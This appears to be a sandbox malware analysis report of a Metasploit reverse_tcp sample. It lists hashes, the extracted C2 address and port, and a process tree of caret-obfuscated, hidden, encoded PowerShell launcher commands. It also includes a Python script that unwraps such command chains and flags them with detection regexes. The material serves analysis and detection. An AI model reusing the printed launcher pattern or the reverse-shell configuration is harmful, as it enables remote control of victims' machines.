Analysis
- max time kernel: 148s
- max time network: 148s
- platform: windows7_x64
- resource: win7-20231215-en
- resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
- submitted: 21/01/2024, 23:22
- Static task: static1
- Behavioral task: behavioral1 (sample 6e1a88382a9a78105094ed412b1a9038.exe, resource win7-20231215-en)
- Behavioral task: behavioral2 (sample 6e1a88382a9a78105094ed412b1a9038.exe, resource win10v2004-20231215-en)
General
- Target: 6e1a88382a9a78105094ed412b1a9038.exe
- Size: 297KB
- MD5: 6e1a88382a9a78105094ed412b1a9038
- SHA1: 5ec88111ba9f5c96e5943a0f0d7ea169c3de97f3
- SHA256: 64dac5ded715c47d9e36381bc87e6205ad02ffbab5b4f516a6bc91bb08fb4b68
- SHA512: 72a01c0733a6b268953c538a23603c9a3710d72ba065c66d512738b73b688f61155ba78e2929e63aa82363c1d0b2bf6bcbf3d74ae78efe29cecab954dea395ea
- SSDEEP: 6144:+9Ckr91bn+UdW5oPGNZuaReIn1mN/YaINny:+ZbnHx8uaR7nEKNy
Malware Config
Extracted
- Family: metasploit
- Payload: windows/reverse_tcp
- C2: 10.0.0.31:4444
Signatures
- MetaSploit
  Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   process
  2380  powershell.exe
  2692  powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   process
  Token: SeDebugPrivilege  2380  powershell.exe
  Token: SeDebugPrivilege  2692  powershell.exe
- Suspicious use of WriteProcessMemory (12 IoCs; each of the three events below is logged four times)
  description                       pid   process                                procid_target
  PID 2180 wrote to memory of 2368  2180  6e1a88382a9a78105094ed412b1a9038.exe   29
  PID 2368 wrote to memory of 2380  2368  cmd.exe                                30
  PID 2380 wrote to memory of 2692  2380  powershell.exe                         31
Processes
- C:\Users\Admin\AppData\Local\Temp\6e1a88382a9a78105094ed412b1a9038.exe (PID 2180)
  command line: "C:\Users\Admin\AppData\Local\Temp\6e1a88382a9a78105094ed412b1a9038.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 2368)
    command line: C:\Windows\system32\cmd.exe /c start /b /min p^o^wer^sh^ell.exe -nop -w hidden -e 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
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2380)
      command line: powershell.exe -nop -w hidden -e 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
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2692)
        command line: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
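The process tree above is a three-layer launcher: cmd.exe starts a caret-obfuscated powershell.exe with -nop -w hidden -e, the decoded command starts a second powershell.exe, and that one's -c argument base64-decodes and gunzips the next stage before running it through a scriptblock. (The image paths sit under SysWOW64 while the command line names system32 because the 32-bit parent is subject to WoW64 file-system redirection; the two paths are the same binary from the parent's point of view.) The Python script below is an added example, not part of this sandbox report, that peels those layers offline. Because the report redacts the base64 blobs, it constructs a command line of the same shape as the one on PID 2368 and unwraps that; the function names, the regexes and the placeholder stage-2 script are this example's own assumptions.

```python
"""Unwrap a cmd.exe -> powershell -e -> powershell -c (gzip+base64) chain.

Added example for this report, not the sandbox's own code. The real base64
blobs are redacted on the page, so SAMPLE_CMDLINE below is constructed to
mirror the shape of the cmd.exe command line in the Processes section.
"""
import base64
import gzip
import re


def deobfuscate_carets(cmdline: str) -> str:
    """Undo cmd.exe caret escaping (p^o^wer^sh^ell.exe -> powershell.exe).
    A caret escapes the next character, so ^^ yields a literal ^.
    Carets inside double quotes are literal in cmd.exe; that case is ignored here."""
    out, i = [], 0
    while i < len(cmdline):
        if cmdline[i] == "^" and i + 1 < len(cmdline):
            out.append(cmdline[i + 1])
            i += 2
        else:
            out.append(cmdline[i])
            i += 1
    return "".join(out)


# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the blob is
# base64 of the script encoded as UTF-16LE.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# The stage-2 pattern on PID 2692: FromBase64String('...') piped into GzipStream.
GZ_B64 = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")


def decode_encoded_command(cmdline: str):
    m = ENC_FLAG.search(cmdline)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None


def decode_gzip_stage(cmdline: str):
    m = GZ_B64.search(cmdline)
    return gzip.decompress(base64.b64decode(m.group(1))).decode("utf-8") if m else None


def unwrap(cmdline: str, max_depth: int = 5) -> list:
    """Return every layer, outermost first, stopping when no decoder applies."""
    cur = deobfuscate_carets(cmdline)  # only layer 0 passes through cmd.exe
    layers = []
    for _ in range(max_depth):
        layers.append(cur)
        nxt = decode_encoded_command(cur)
        if nxt is None:
            nxt = decode_gzip_stage(cur)
        if nxt is None:
            break
        cur = nxt
    return layers


# Tells a process-creation detection would key on, one regex per tell.
SUSPICIOUS = {
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "encoded_command": ENC_FLAG,
    "gzip_scriptblock": GZ_B64,
    "caret_obfuscation": re.compile(r"\^"),
}


def flags(cmdline: str) -> list:
    """Sorted names of the SUSPICIOUS patterns present in one command line."""
    return sorted(name for name, rx in SUSPICIOUS.items() if rx.search(cmdline))


# Constructed placeholder; the report redacts the real stage-2 script.
INNER_SCRIPT = "Write-Output 'constructed stage-2 placeholder'"


def build_sample(inner: str = INNER_SCRIPT) -> str:
    """Build a cmd.exe command line shaped like the one on PID 2368 (constructed)."""
    gz_b64 = base64.b64encode(gzip.compress(inner.encode("utf-8"))).decode()
    stage1 = (
        "powershell.exe -nop -w hidden -c &([scriptblock]::create((New-Object "
        "System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object "
        "System.IO.MemoryStream(,[System.Convert]::FromBase64String('" + gz_b64 + "'))),"
        "[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
    )
    enc = base64.b64encode(stage1.encode("utf-16-le")).decode()
    return ("C:\\Windows\\system32\\cmd.exe /c start /b /min "
            "p^o^wer^sh^ell.exe -nop -w hidden -e " + enc)


SAMPLE_CMDLINE = build_sample()

if __name__ == "__main__":
    for depth, layer in enumerate(unwrap(SAMPLE_CMDLINE)):
        print(f"[layer {depth}] flags={flags(layer)}")
        print("  " + layer[:120] + ("..." if len(layer) > 120 else ""))
```

To apply it to a real capture, pass the cmd.exe command line with its base64 intact to unwrap(); each returned layer is what the next process actually executed, and flags() on each layer shows which of the -nop, -w hidden, -e, gzip-scriptblock and caret tells fire at that stage, which is the set a rule on process-creation telemetry (Sysmon event 1 or 4688 with command-line logging) would match on.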
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: e2b34276e81369423d465477a6bcf511
  SHA1: 35a8a6e55aad69621450128b8228efe2f883f254
  SHA256: 164230911069a14e298474c336d8cc47302a50a34474d89486b07d8b6444e944
  SHA512: e5c72a84f410df6001c967020ee32d3656c8cf121ab72625faa27742bd51d7aa9c99f8399728c9601b53a34d6b1b881814001f1964cc2312cb711de692bfe58f